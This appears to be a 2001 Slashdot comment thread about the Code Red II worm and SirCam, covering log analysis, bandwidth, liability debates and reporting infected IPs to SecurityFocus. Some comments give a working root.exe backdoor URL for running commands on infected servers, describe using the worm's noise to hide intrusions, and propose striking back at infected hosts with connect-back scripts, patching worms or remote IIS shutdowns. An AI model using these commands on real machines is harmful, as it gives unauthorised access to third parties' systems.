I noticed this the other night (5th Aug Oz time), when my youngun complained about net speed. Traceroutes to west coast USA from OZ showed that traffic inside Australia was OK, but big congestions stateside (3sec hops !) Inspection of apache logs showed a new variant of the worm in action, and it has not slowed down yet. Anyway, is there a repository somewhere where we can all upload lists of (confirmed) infected IP addresses ? a quick perl script pulls them out of the apache logs. Maybe someone can know up a service where we can post IP address lists, and have these accumulate into a monster IP list. Then make the IP list available for download. What you do with it after that is up to you. This is really good - hacking made easy, I imagine that there are a lot of newbies who can get started into real hacking because of this useful new feature introduced by Microsoft. This is probably the first (and only) thing that Bill Gates has done to dramatically improve the state of the art in Computer Science. The next generation of users should be better educated because of this. Thanks Bill !

Re:Apache users Create default.ida 5mb!!!!

[guuyuk]

Yeah, but Microsoft would just accuse us of creating viral software to attack their site. :-)

Quick! someone write an RFC

[firewood]

but what I wonder is if you could get away with creating a CGI called default.ida that attempted to automatically connect back to the client, disinfect the machine, and install a patch. It is much less dangerous since it doesn't reproduce, and you could certainly make the argument that it was only done in retaliation to someone (unwittingly) attempting to infect your computer with a virus.

Why not redefine the protocol to where this is the correct and proper response to a codered type connection to port 80?

Re:Bad Idea

[Borogove]

One of the interesting side-effects of CodeRed that hasn't been discussed is this: anyone who wants to can now hack other machines with almost complete anonymity.

I've now got a huge list of IP addresses of badly administered machines with a known IIS backdoor. It's highly unlikely that anyone would notice my attempts to hack this machine over the background noise of CodeRed traffic flying around.

In a sense, CodeRed provides a smoke-screen for other hacking attempts, and a 'smoke-signal' to let hackers know where infected servers are.

Can we sue to neglegent webserver's owners

[iconnor]

After all, if they insist on running buggy software (IIS) and don't take the time to install security patches, this is negligent.

1. There is a duty to other internet users not to waste their resource (bandwidth);
2. There has been a breach of this duty (either running IIS or at least not installing patches); and
3. It has caused damage (used up my valuable bandwidth and log disk space).

I think we should all take each IIS server owner to small claims court and extract our few dollars of damages.
That way, it would make more economical sense to run Apache. The server owners will not have to pay for the software or the legal damages that would follow.


Sample Letter of Complaint
Your Name
Address
Date
(Name/Address)

Dear ________________ ,
On (specify date), an attempt was made by your server to infect or otherwise incapacitate my server. As you are responsible for your server, you have a duty to maintain it and take reasonable steps to ensure that it does not cause damage to other computers on the internet. I assert that either by running fault software, or in the alternative failing to keep security patches installed according to the manufacturer's guidelines, you have breached this duty of care. As a result, your servers caused my administrators to spend unnecessary effort diagnosing bandwidth and security issues and wasted bandwidth belonging to me. I hereby demand the sum of $200 for administrator's time and wasted bandwidth.

Sincerely yours,
Signature
--Send certified mail, return receipt requested.

Re:The Breaking Point

[demaria]

Most closed source software comes with the same disclaimer.

Re:huge cable modem hits

[iturbide]

OK, You can use tcpdump and/or ethereal to check traffic over your interface. Be ready for rpm dependency resolution hell, but any decent distro should have all the neccessary packages. Ethereal is the damned good GUI thing sitting on top of tcpdump, and it will tell you straightaway what is going on.

And I will now duck for all those people who will tell you you shouldn't install X on anything connected to the internet. Do a man on tcpdump to see what switch will save traffic to text-readable file.

Enjoy

Re:huge cable modem hits

[rknop]

Yes, I'm seeing an ungodly number of ARP requests as well, which may also be Code Red connected. (Who knows.)

-Rob

Re:The Breaking Point

[Silver222]

As long as you don't author a bug that is intentionally malicious, I'm sure a jury would accept the "You get what you pay for" excuse. It would be a lot easier for Linus to defend a suit like that than it would be for Billy.

Re:The Breaking Point

[Grishnakh]

Open-source is a little different. It comes with a disclaimer that they're not responsible for anything that goes wrong. When you receive something for free, you can't exactly expect to hold the author liable for any problems.

MS-ware OTOH costs a lot of money, and for that money, people should expect proper operation.

Perhaps software creators should be all held liable, based on the cost of their software: you can sue for 100 times what you paid, for instance.

Re:huge cable modem hits

[markov_chain]

Several hits a minute? That's a minor amount of traffic. Let's see, say 6 hits per minute, at 8 packets per TCP connection to port 80, at 125 bytes per packet. That leaves us with 1000 bytes per connection, and 6000 bytes per minute. This is 100 bytes per second, or 800 bits per second, or 0.8 Kbps. For comparison, if your cable connection is any good, you're downloading stuff at at least 1Mbps-- thousand times faster.

I would expect the real waste of bandwidth to come not from the infection probes, but from the virus trying to send junk to target websites, such as the first Code Red did try to whitehouse.gov.

~

Re:Securityfocus asks for IPs

[Cave+Dweller]

Oh, and don't forget to tack a '| uniq' there :)

Re:huge cable modem hits

[stcanard]

This is a me too -- my firewall logs are filing up with DENY's on port 80, ever since last night.

Out of curiosity I've tried loading web pages from a number of the ip addresses in my logs and it seems that a lot of people on @home really hate us US government!

link

[clinko]

I have a great link on this topic:

http://slashdot.org/article.pl?sid=01/08/05/043321 9&mode=thread

Re:I thought Sircam

[catman]

only hits Outlook users, not every email user? Are telling me BeMail and Kmail are vulnerable. Ok, and Pegasus.
They cannot be infected, but they have to cope with the stream of files dumped on them by Sircam - getting several 100Kbytes daily here, worst hit was 11 Mbytes ..

Re:huge cable modem hits

[friedmud]

I too am with @Home and have been seeing large amounts of info flow into my cable modem. I am running a Masqueraded Linux box to connect my LAN to the Net - and it has been eating up all the packets - but I can't find a way to log them at all. I suspect that someone on my cable loop is probably infected with CodeRed and I am seeing all of the outgoing packets but I have no real way to tell. Does anyone know of a good way to save these packets from the bit-bucket so that we can find out who is sending them?? I really don't like the way my cable modem is flashing - it just bothers me.

meanwhile...

[TheQuantumShift]

how much bandwidth has Windows wasted in the past few years...

Why do people still use Outlook?

[alfredo]

there are still alternatives out there, might as well get a copy before MS devours them too.

We need to push for a Lemon law for software. I think it is time folks. MS's license ensures one cannot hold them responsible for their imcompetance, or if you read I Cringley this week, their planned mediocracy.

Re:Why do people still use Outlook?

[Osty]

What the hell does Outlook have to do at all wiht Code Red?

Let's assume for a second that you were talking about Taco's reference to SirCam. Now, a couple things come to mind.

1. It's not Microsoft's fault that users actively executed an attachment -- That's the user's own damned problem.
2. Microsoft has done quite a bit to protect users from themselves (from popping up a warning on every attachment, to actively stripping malicious attachments in Outlook XP).
3. Microsoft has addressed this issue in service packs for earlier versions, by actively stripping attachments and/or disallowing the execution of an attachment.
4. While Microsoft's license does disavow them from any responsibility for your ineptitude, they do still put out hot fixes and service packs.
5. There's no excuse for the SirCam virus, because the hf's and sp's that prevent such a thing have existed for years now.

Please take some personal responsibility when you do something stupid (like execute an attachment), just as others should take the same responsibility when they screw up. Yelling, "There should be a law!" just makes you look like a dumb liberal that needs the government to protect him from himself.

Re:Why do people still use Outlook?

[alfredo]

Don't you think businesses should held responsible if they sell a shoddy product?

MS seems to push product out the door when they are "good enough", not when they are ready. We end up being the cannon fodder.

Let's see you try to return some software to them saying it is defective.

There is no consumer protection when it comes to software. All other industry has some standard they must achieve. What makes software exempt from consumer protection laws?

Re:Why do people still use Outlook?

[BigBlockMopar]

Yelling, "There should be a law!" just makes you look like a dumb liberal that needs the government to protect him from himself.

For sure, and such a law would stifle innovation far more than Microsoft has. Imagine the liability in releasing a beta (or... gasp! an alpha) version?

Now, I think there have to be other ways to go after Microsloth, more than legislation. What's needed is a judge - perhaps one as braindead as the one who awarded millions to the dumb woman who spilled coffee on her lap - who can be used to our advantage in a class-action lawsuit from all victims of the default-dangerous Microsoft machines in the field.

Re:The Breaking Point

[rberger]

Why not a class action suit against Microsoft? Seems that would be an appropriate action since Microsoft is now officially a monopoly, end users who are recieving the SirCam files who are not Microsoft users are one good class. ISPs who do not use Microsoft servers who's networks are being floodded by Code Red and SirCam are another good class...

And even the clueless ones who continue to use inherently defective software such as Outlook and IIS have as much right to sue MS as people who smoked for 50 years have to sue tobacco firms...

Re:The Breaking Point

[NetJunkie]

Sueing software makers for bugs is a "bad idea". How many open source authors are going to want to be held liable for that when they don't even get paid for their work? Not many.

Re:huge cable modem hits

[dj28]

No kidding. My cable modem data light blinks non-stop now. Fortunately, the router is blocking anything to port 80. But from the way data is pouring in, i would figure it to be several scans per minute to my cable modem.

Sadmind/IIS unicode worm already did that

[BCoates]

the Sadmind/IIS unicode worm already did the copy-cmd.exe-to-the-scripts-directory thing. CodeRed uses the same vulnerability, just attaches a different payload than changing your index.html to "f--- usa!", etc.

Kiddies were already scanning around for /scripts/root.exe and using it to set up those lovely little DoS scripts...

--
Benjamin Coates

Re:Sadmind/IIS unicode worm already did that

[sigurdur]

Code Red and Sadmind/IIS does not use the same vulnerability.

Code Red in all incarnations use a vulnerability in the Indexing Server Stuff (TM) while Sadmind/IIS used a directory traversal vulnerability. See CA-2001-19 and CA-2001-13, both at CERT/CC for more info on the vulnerabilities.

this sucks

[aechols]

some grepping and word counting revealed about 606 hits as of about 5:00 CDT last night. my first attack was at Aug 3 at 23:40 CDT. i dont think the activity light on my cable modem has stopped blinking yet. each computer attempts to get to infect three times before it gives up & moves on.

what i don't look forward to is probably an increase in this kind of crap as XP rolls out with raw socket support. (if you read GRC stuff then this is old news) script kiddies everywhere, and more attacks can be made that were previously impossible or at the least difficult to accomplish. yes its true that this started in w2k, but does everybody actually have w2k? nope. they're really gonna push XP though, unlike any of the upgrades past 95.

then again maybe everyone does have it, seeing how many attacks i'm getting. the most aggravating thing about this is that all of the attacks just bounce off me (proudly microsoft free :) but my connection sucks now because of all the morons that didnt patch themselves up after the first time it went around.

Re:this sucks

[wapentake]

XP's raw socket support won't make things any worse. If code red wanted raw socket support, it could have included winpcap & a packet driver in the payload, and achieved raw socket capabilities. The worries about XP's raw socket support are rubbish. I daily criticize micros~1 for waiting so long to add raw socket support. It has so many uses.

Re:this sucks

[raju1kabir]

my point about raw socket support & code red is that a similar worm could appear, one that requires the use of malformed packets to take control of the IIS server/other microsoft product

This is getting better and better. How are you going to take control of IIS with malformed packets?

Re:The Breaking Point

[tbo]

Didn't say it was a good idea. I just said it could happen. I'm sure MS would love it, because it would destroy Linux.

SirCam procmail recipe

[tstock]

:0 B
* > 100000
* mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6HD o8OkQ6SD
/dev/null

Re:SirCam procmail recipe

[tstock]

actually, there is no space between HD and o8 on the recipe above. I blame this typo on /.

Bad Idea

[Sludge]

By design, it's a very bad idea to make your trojan/virus do anything too shocking.

Ever boiled a frog? If you throw a frog in hot water, it'll jump out. If you slowly turn up the heat, it'll roast.

This sort of violent behaviour in a virus stops it from being able to live with it's host, because it gets detected way too fast. A worm/virus/trojan that has too great a consequence on it's host will be wiped out too soon, and in the case of the worm, this means lesser propogation.

<\Devil's advocate>

zero day nirvana

[LinuxHam]

Think about what CRII is going to do for the zero day lists!! Hey.. how about a gnutella hack that automatically accepts uploads and shares 'em right back out??

Re:zero day nirvana

[Dr.+Spork]

Interesting! How about recruiting zombies to act as gnutella hubs? The problem with your plan is that after the attack is detected, it will be very easy to see who actually uploaded to you (unless there's some way of masking that...).

Re:zero day nirvana

[LinuxHam]

how about this gnutella hack having built-in support for tcp bounces.. servers will find IPs of other servers in their logs.. the bounce servers won't log bounce traffic.. it'll be just like how NAT works today..

hey I got it.. the gnutella peers find themselves based on detected probes!! they don't even have to look for each other.. they automatically announce!

now if we could just select a port and community string..

Re:Someone needs to write

[norton_I]

That is probably illegal, and certainly a bad idea (self reproducing code almost always causes problems even when you don't intend it to) but what I wonder is if you could get away with creating a CGI called default.ida that attempted to automatically connect back to the client, disinfect the machine, and install a patch. It is much less dangerous since it doesn't reproduce, and you could certainly make the argument that it was only done in retaliation to someone (unwittingly) attempting to infect your computer with a virus.

Imagine? Nah...

[tsmit]

I have to live with it being on the biggest "script kiddie" network on earth (ATT Broadband). I'm getting approximately 3000 HTTP port probes against my machine an hour (without a webserver). If i reboot my windows machine, it takes me 30 minutes to get a DHCP address due to the fact that the DHCP server is hosed.

DoS attack against the Whitehouse? I don't think so, how about a DoS attack against everyone? I can't even get to servers in Italy.

huge cable modem hits

[rknop]

I've got a cable modem on nash1.tn.home.com, and my iptables log is seeing a huge number of hits (we're talking an average of several a minute, more or less) to port 80. Since I'm not actually running a web server, I don't have the logs that tell me if this is in fact Code Red, but I suspect that's what a huge amount of this activity is.

It's depressing, really.

-Rob

Re:huge cable modem hits

[dozing]

Now consider that the bandwidth for cable modems is shared among all the users on the same loop and multiply that 0.8Kbps you speak of times all the people on that loop. It still might not be huge but it is significant.

Re:huge cable modem hits

[IronChef]

You aren't even supposed to send email to your job from an @home account. (no joke, tech support is adamant about that.) They have an @work package if you need to do business stuff.

In typical @home fashion, the upgrade to @work isn't available to all @home subscribers, because it is a DSL service, not cable modem... the coverage doesn't overlap 100%.

I'll keep violating the @home TOS quite happily, so long as they are dense enough to let me.

Re:huge cable modem hits

[friedmud]

TCPDump is working just fine - seems like a huge number of "arp who-has" commands are streaming in.

I don't think whatever is looking for these addresses is being very successfull - I haven't been able to contact any of the ips it is looking for - seems to be very inefficient.

Thanks for the heads up about ethereal but I don't have a monitor/keyboard/mouse connected to my router at all - just a lonely box in the corner :)

-Fried

Re:huge cable modem hits

[modecx]

If it has enuf disc space, install the X libraries, and Ethereal, and operate all your fun X stuff over ssh tunnel. As easy as that.

Re:huge cable modem hits

[Croaker]

No kidding. My cable modem data light blinks non-stop now.

Mine too. I'm on AT&T Broadband/Road Runner/Whatever the hell they are calling themselves now.

I have a website up, so Apache is logging all hits on the site... it seems the access_log is only logging one attempt to access the site per infected host... the error_log indicates that the worm is actually hitting the site three times in quick succession (I think over a period of minutes). The only thing is, neither log really accounts for all the traffic that appears at the modem. Everything else is being blocked by the router/firewall appliance, which doesn't have great logging capabilities.

It looks like Red Alert recently hit a motherload of AT&T broadband sites, since I am seeing mostly sites hitting me that trace back to AT&T. Like another poster mentioned, you're not supposed to be running servers (so... sshh! I'm not running anything ;). I'm willing to bet a good number of people have an install of Windows 2000 or NT up with IIS installed and running by default. I bet most don't even know they are running a web server, much less that it's been infected. The few sites I tried to access that appear in my log all have the default "this page not available" thing, which is what I think IIS coughs up if you've not made some directory the server root.

I suspect one thing is that the DSL and cable companies may be prompted to crack down on servers hosted on their network. I mean, if they really wanted to enforce the ban, they can just do a sweep of their network and tell you to know it off or they will pull the plug. I wonder if they will actually start doing this.

Re:huge cable modem hits

[iturbide]

Pah. Just run it on vnc, that'll work fine. Just do a search on vnc at freshmeat.net and you'll find what you need to run X apps on your server.
There are other X-servers (actually technically a bit of a different thing) out there, too. Some of them cost money.

Re:huge cable modem hits

[Saint+Aardvark]

I'm on ADSL, Telus in Vancouver. It's the Code Red Monty Python skit: "Arp, arp, arp, arp, arp, arp, arp, arp...."

Re:huge cable modem hits

[interiot]

I mean, if they really wanted to enforce the ban, they can just do a sweep of their network and tell you to know it off or they will pull the plug.

They don't even have to go to that great of an effort. All they need to do is have their routers check a single bit in the TCP header to see if it's an incoming SYN packet, and ignore all of those.

I assume they haven't done this because it would piss off ICQ users and such. And I think they really mean "no bandwidth hogging servers".

But they could easily block incoming SYN packets on specific ports (in fact, they have the ability to do this, they're doing it for a very limited number of ports (netbios)). I assume thir unwritten policy is to be nice, but they want to have a legal safety net there for when they want to start swinging their axes. Kind of strange, I think.

Re:huge cable modem hits

[ogre2112]

I'm running a webserver, and I just checked my logs...

OUCH! 200 hits from code red today alone. The earliest hit I saw was on July 19th.

Re:huge cable modem hits

[jsse]

So I install Apache to collect the logs for the historic momemt. :)

Re:huge cable modem hits

[PupSteR]

heh yeah it's funny, i checked my webserver logs, 40 in a minute.. funny.. good for historical information, and to turn into @home :)

Re:huge cable modem hits

[PupSteR]

Yep, I'll keep doing the same, at least until I go to college next month... then i'll violate the TOS for college by running a dormroom server. need i say more?

Re:huge cable modem hits

[jrockway]

It's from the Code Red randomly guessing IP's. Every time the arp-cache sees an IP it doesn't know, it has to ask. So when Code Red starts spitting random IP's out, an arp how-has comes out. See example:

Worm:
1.1.1.1:80 --> GET /default.ida?[snip]
1.1.1.2:80 --> GET /default.ida?[snip]
1.1.1.3:80 --> GET /default.ida?[snip]
1.1.1.4:80 --> GET /default.ida?[snip]

Router
1.1.1.255 --> arp who-has 1.1.1.1
1.1.1.255 --> arp who-has 1.1.1.2
1.1.1.255 --> arp who-has 1.1.1.3
1.1.1.255 --> arp who-has 1.1.1.4

Or something like that...

Nasty as it gets?

[Spackler]

Or just plain simple?
Just type the following into a browser using one of the infected systems from your log file:

http://infected_system/scripts/root.exe?/c+dir+c:\

You are greeted with a directory listing of the root of C:\!
I just LOVE windows!
This is going to get MUCH worse!

Re:Nasty as it gets?

[Tomcow2000]

Actually, you can sue them. That doesn't mean you'll win, but knowing MS, they'll settle rather than endure a long court case (especially with current lawsuits against them)

Mountain Dew: Code Red

[Spaztek]

Speaking of Code Red, mountain dew code red is a highly malicious blend of virus, cough syroupe, and caffeine. All are bad except caffeine. Just like this virus, all are bad on windows machines, except those which arent windows machines. I guess linux is like the caffeine of all soda. The good parts :-)

Compromised Machines are abundant

[spinfire]

Almost all of these machines are infected with the CR II varient, and most of them reside in the same class A/B subnet. I tried the root attempt myself on one of them, result are here.

Re:Anyone still consider this a Microsoft problem?

[LinuxHam]

now are either workstations with IIS installed and the user doesn't know/remember

A friend of mine is a cable modem user who got infected. He said on or about the 1st, his cable modem light suddenly became maxed out. He's usually good with his system administration, but he recently switched back from RH to Win2k server. He checked and checked and found out that some Windows Media Server had been installed and was running its own copy of IIS, which had been infected.

The next day he installed Apache Win32.

The Breaking Point

[tbo]

I think Code Red (and Sircam, which your average Joe will probably lump together with Code Red in his mind) will be the virus that breaks the camel's back. It's gotten constant publicity, it's coming back for a second round, and this time, it wants blood.

What will happen? I don't know, but here are some possibilities:

Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.

Lawsuit. Assuming the virus writers aren't found, the next logical targets will be Microsoft, and owners of a large number of infected hosts. Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch. Microsoft can always hide behind their patch, which was available well in advance, and claim that "everyone knows that bugs happen, and it's up to admins to keep up to date" (never mind that this contradicts their own marketing material--when has inconsistency ever stopped marketing before?). Suing somebody with a large bunch of infected hosts is also silly, since, to be infected by them, you have to be just as inept as them.

Government Intervention. Some state governors may push silly state bills, but they'll be irrelevant. What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances (i.e., can you sue MS? For how much?). Why it probably won't happen. With Congress and Bush on vacation, not much will get done in at least the next month, and things will probably have come to a head before then. Only if this round does serious damage (perhaps the world's biggest DDoS against some high-profile targets, like Akamai), and another generation of Code Red pops up in September (just in time to catch all those college PCs with their pirated copies of Windows 2000 Server and high bandwidth), will this become a real possibility.

Internet Collapses. I really doubt it, I just had to say it to satisfy Cringley :-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.

So, which will it be, folks? This would make a great SlashPoll.

Re:The Breaking Point

[Tack]

Or, the more probable outcome:

Nothing. That's right. Life goes on as usual. The net and its users survive yet another disturbance in the force, and we return to our regularly scheduled program.

Jason.

Re:The Breaking Point

That's a good point. Should be modded up, if moderators were not smoking crap right now.

Re:The Breaking Point

[jolan]

djbdns is an open source replacement. you get a cash award for finding vulnerabilities in it. the only reason i can see for suing a software company is if there is a glaring security problem and they act slow to fix it, or deny that it is a problem. microsoft used to do both of these, but have since gotten much better. it really is funny though when microsoft servers get defaced/hacked. it seems that they too can lack the competence to patch (their own) servers.

Re:The Breaking Point

[Saint+Nobody]

yeah, i laughed when i got a port 80 hit from cust2120.EzSecureHosting.com it's apparently not as secure as they would have people think, so customer 2120 could probably sue them.

and microsoft has the same "we make no guarantees" clauses that free software licenses have, so either the case would be dismissed, or clauses like that would be ruled illegal, which could be bad for free software, unless they only made it illegal to attach those clauses to commercial software

Re:The Breaking Point

[jesser]

Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch.

Three words: class action lawsuit.

Re:The Breaking Point

[MajroMax]

Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.

As much as I like the idea of Microsoft paying through the nose, I would really it rather not happen because of Code Red. Why? Because Microsoft really isn't to blame here.

The security flaw was exposed to the public (not kept secret), and a patch was released & made available a full month before the main CR outbreak. They did everything they reasonably should have.

Internet Collapses. I really doubt it, I just had to say it to satisfy Cringley :-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.

Actually, I woldn't particularly mind it if every AOL/MSN/Etc. subscriber decided that the Internet was too dangerous and unplugged their computer. More bandwidth for me. :)

Re:The Breaking Point

[nyet]

None of the above.

I vote for

Crucify the next virus writer (or other random, innocent hacker) they manage to catch and pass more inane laws that have no other effect but to make your life as a programmer even more difficult. Microsoft will hailed as the "hero" in the case, them being the underdogs against a sea of malicious open source hackers, when they release a patch that closes the script kiddie hole of the week, but not much else. 3rd party vendors will scramble to create more useless server side "personal firewall" applications that filter ONLY traffic based on *OLD* infection methods. No attempt will be made to make IIS itself less of a security risk. No reporting of IIS cgi-child processes running with admin level permissions will be made. Releasing the results of virus related research will become illegal. Discussing possible future vulerabilties will become illegal. Using any "hacker" operating system (e.g. not made by Microsoft) will become illegal. Using the word "virus" or "worm" anywhere on the Internet will earn you a visit from the FBI (after all, if you are innocent, you have nothing to hide). That small inconvenience of having all of your "computer related" possessions confiscated (including your home and car) and yourself thrown in jail w/o bail is insigificant when compared to the amount of viruses prevented from spreading.

Re:The Breaking Point

[nyet]

The security flaw was exposed to the public (not kept secret), and a patch was released & made available a full month before the main CR outbreak. They did everything they reasonably should have.

Except that IIS still runs with admin priveledges. Nice try though.

Re:The Breaking Point

[Kris_J]

You forget ICE -- the rather romantic "Intrusion Countermeasure Electronics" -- an automated response to terminate unauthorised hack attempts. I'm currently running the IIS shutdown line as specified by other /. posters for every IP address that probes me (I'm on a dymanic 56k dialup, I should not be getting HTTP requests -- I never did before CodeRed). It would probably be trivial to automate the process, and POOF! your first ICE program.

Re:The Breaking Point

[p_trinli]

Gates drops to his knees and begs Linus's forgiveness, pledging to devote Microsoft's thousands of programs to stable, secure, efficient open source software. Bill Gates may decide to Do the Right Thing. Why it probably won't happen. Gates is still mad with power, and sore over a wedgie received in high school.

Re:The Breaking Point

[automandc]

You left out the most likely (SlashPoll) option:

CowboyNeal Saves the Day!

Re:The Breaking Point

[Shotgun+Willy]

The SlashPoll result is obvious: CowboyNeal!!

Re:The Breaking Point

[Tony-A]

There is a critical difference with open source, paid or unpaid. With open source, the recipient of the code is in a position to diagnose and debug the code. Without open source, the recipient of the code must rely on the authors. If the legal system is at all reasonable, that should make a lot of difference.

oh c'mon...

please. posting another story like this is almost as big a waste of bandwidth as the worm.

please reference previous stories: http://slashdot.org/article.pl?sid=01/08/05/043321 9.

Anyone still consider this a Microsoft problem?

[NetJunkie]

I can understand admins not patching when the fix first hit. The usual "Won't happen to me problem". But now? After all this press? All the news stories?

I think the systems we're seeing infected now are either workstations with IIS installed and the user doesn't know/remember, or server with no real support staff sitting in a closet somewhere. Now the question is, will they EVER get patched?

Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that? :)

...and these machines are proud of it!

[Sun+Tzu]

heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise their new status to everyone with a webserver on port 80.

Securityfocus asks for IPs

[mawis]

To notify the administrators of the attacking servers you can send their IP followed by the date and time of the attack to aris-report@securityfocus.com. - Please use this format because it's a robot address. http://securityfocus.com/announcements/310

Re:Securityfocus asks for IPs

[Cave+Dweller]

Here's a quick (and ugly, ugly, ugly) kludge:

cat access_log | grep default.ida | tr -d '[' | tr -d ']' | awk '{print $1 " " $4 " " $5}'

Re:Securityfocus asks for IPs

[ssimpson]

This is probably a stupid point from a Linux newbie, but don't you have to add a "| sort | uniq"? My limited understanding is that uniq only removes duplicate consecutive entries?

Re:Securityfocus asks for IPs

[blakestah]

This one works for me for default apache logging options. 50 IP addresses so far. All your IIS servers are belong to me.

grep \?XXX /var/log/apache/access.log | mawk '{ print($1 " "$4 " " $5) }' | Mail -s "Compromised machines" aris-report@securityfocus.com

Re:Securityfocus asks for IPs

[Paranoid]

Thats the correct way to use uniq, yes. However, since the dates and times are all different, uniq won't do much. All that addition would end up doing is sorting by IP address, rather than by time.

Re:Securityfocus asks for IPs

[LightningTH]

In reply to this, I have written a script for myself but of course giving it out for others to use also. It will go thru apache's access log and auto-alert security focus to new IPs. Ya jut have to setup a crontab job to fire it off once in awhile.

Just do a wget on http://www.lightspeed.cx/code-red-ii-mail, open it up and modify it slightly for the paths. Going to the link may make the file unreadable in some browsers.

lucky

[orbitalia]

..that code red I wasnt written along the lines of code red II. There would be alot more unpatched websites out there with super user wide open.. I think this hints that code red I and code red II are written by different people.

Experiment

[XBL]

I am on @Home, and have an unpatched Windows 2000 Server (Warez Edition) installation. I've just turned it on a half-hour ago. Now let's see how long it takes to get the worm. If I get it, I'll post an update with the time.

Right now my NIC is flickering like mad, yet Windows 2000 does not show these as incoming or outgoing packets. What is going on?

Re:Experiment

[XBL]

Well, nothing yet, after 1 hour...

Re:Experiment

[XBL]

Well, almost 2 hours, and not one attempt. The only thing on the log file is me.

Interesting...

Re:Experiment

[XBL]

No its not. My Linux box was doing it before I even turned on the W2k server box. So there :-P

Re:Experiment

[Fenris+Ulf]

Probably ARP requests. Here on my end of @Home, every hour or two I get arp requests for every IP in our netblock, which I presume is the NOC's way of keeping track of who is using which IPs. This has been happening since I got the service a year ago, so I doubt it's an attacker. If you hook a Unix box up to the feed, you can tcpdump it and see the ARP packets. I imagine there must be some equivalent for Win boxen too.

Re:Experiment

[p_trinli]

When I plug in boxes on campus, the NICs always "blink like mad," even when the main system is off. It must be staying current with the network for some reason.

Gnu/Sircam?

[Tachys]

I wanted to know would it be possible to make a similar virus for Linux using a Bash Shell.

If not, why not?

Re:Gnu/Sircam?

[LinuxHam]

The tough part is getting a remote machine to execute code without knowledge of the machine owner. Cheesy email viruses are usually scripts embedded in documents and spreadsheets that automatically execute when the user opens the attachment. Hence the daily feeding of, "never open attachments you weren't expecting."

The better email virii cause the end users' machines to execute code as soon as the email is received. That's a huge problem with Outlook. Think about the millions of office workers who never exit Outlook, even when going home for the weekend, and those with cable modems who leave Outlook up all day. Yes, you can make Outlook automatically dialup to retreive email, but I doubt many people actually do that.

AFAIK, no GNU mail readers support automatically executing scripts stored in email. Can anyone vouch for Netscape? One would think that would be closest risk to the same problems, but it would find so few users in the world.

Re:Gnu/Sircam?

[jorbettis]

Similar to Sircam? Not presently.

MIME attachments won't have the execute permission set, which means that a script would have to be saved to disk and executed by the user with the command

$ bash virus.sh

Or the user would have to set the execute permissions himself:$ chmod u+x virus.sh
$virus.sh

Granted, a mail reader could be written to do all of this itself after the user ``clicks'' on the attachment, but I am aware of none that exist at the present time that have that ``feature''.

Plus, since GNU/Linux (and all Unices) is a multi-user permissions based system, sircam would only be able to touch those files to which the user has read access. As long as the administrater isn't reading his mail as root, you'll never have to worry about some luser mailing his /etc/shadow to you.

So, until Microsoft writes a port Outlook and starts certifying ``Linux Engineers'', no, there won't be a sircam for GNU/Linux.

Re:Gnu/Sircam?

[Glytch]

I don't doubt it. Frankly, it's hard to imagine a feature that Emacs doesn't have and/or hasn't had. :)

Re:Gnu/Sircam?

[Goonie]

IIRC, Emacs *did* have a problem allowing mail to contain arbitrary bits of elisp code which were auto-executed by emacs, but they took out this feature a long time ago.

Anybody got more details?

CmdrTaco runs Windows

[�nubis]

I still think sircam is more annoying since it affects every email user

Every email user?!? CmdrTaco must run Windows. Let's get him!

Re:CmdrTaco runs Windows

[M.+Silver]

Every email user?!? CmdrTaco must run Windows. Let's get him!

I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)

Re:CmdrTaco runs Windows

[kilrogg]

I think what he meant was the even non-windows people still receive annoying sircam email from windoze user (though I haven't).

His statement is slightly wrong, since even non-IIS using people still get infection attempts from IIS servers. My access_log from yesterday now stands at 300K, so Taco's wrong, CR does affect me too, in a way.

Re:CmdrTaco runs Windows

[whatnotever]

Um, I think he meant that it sends massive files to random people, regardless of their OS. Thus, Joe Linux gets as much crap in his box as Jim Windoze.

Script kiddie

[SnapperHead]

This script kiddie won't stop until he gets all over the news about the damage it caused.

Another 13 year old looking for attention.

My prediction...

[logicfuzzy]

First came NNNNNNN then XXXXX... Hmmmmm. I predict two more versions : IIIIIII and UUUUUUU.. It's a word scramble game!

I'm sorely tempted . . .

[Floyd+Turbo]

Is there a Windows command line equivalent to "shutdown -h now", by any chance? I know I really shouldn't do it, but I'd be so sorely tempted to write a script that would shut down any infected box that scanned mine.

The more I think about it, the more it seems like a permissible act of self defense. It does no harm to the infected box (if the worm doesn't write itself to disk, as I've read, it actually helps) and prevents the infected box from being used to perpetuate more abuse.

Hmm . . .

Re:I'm sorely tempted . . .

[Greyfox]

You want this: http://support.microsoft.com/support/kb/articles/Q 202/0/13.ASP Happy little command called IISRESET. I think an IISRESET /STOP is in order...

Re:I'm sorely tempted . . .

[nugatory]

The more I think about it, the more it seems like a permissible act of self defense.

I sympthize a lot with the soreness of your temptation, but I also think you misspelled "less" somewhere in the quoted sentence :-)
Self-defense only applies when you are defending yourself and have no alternative. If a crazed axe murderer is pounding at your door with the avowed intent of hacking you into bloody bits, it's self-defense if you shoot him when he bursts through the door. It's self-defense if you shoot him after it's obvious that he will succeed him breaking down the door. But you are not allowed to shoot him if your door is protecting you - that's what the door and the 911 dispatcher is there for.

You wouldn't be posting here if you actually had any measurable vulnerability to CRII, so there's no question of self-defense. You're already defended. Both legally and ethically the right thing to do is to notify the owner of the offending machine, or their ISP (who does have the right to shut off their internet access) and let them deal with it.

But I still feel the temptation....

Re:I'm sorely tempted . . .

[Floyd+Turbo]

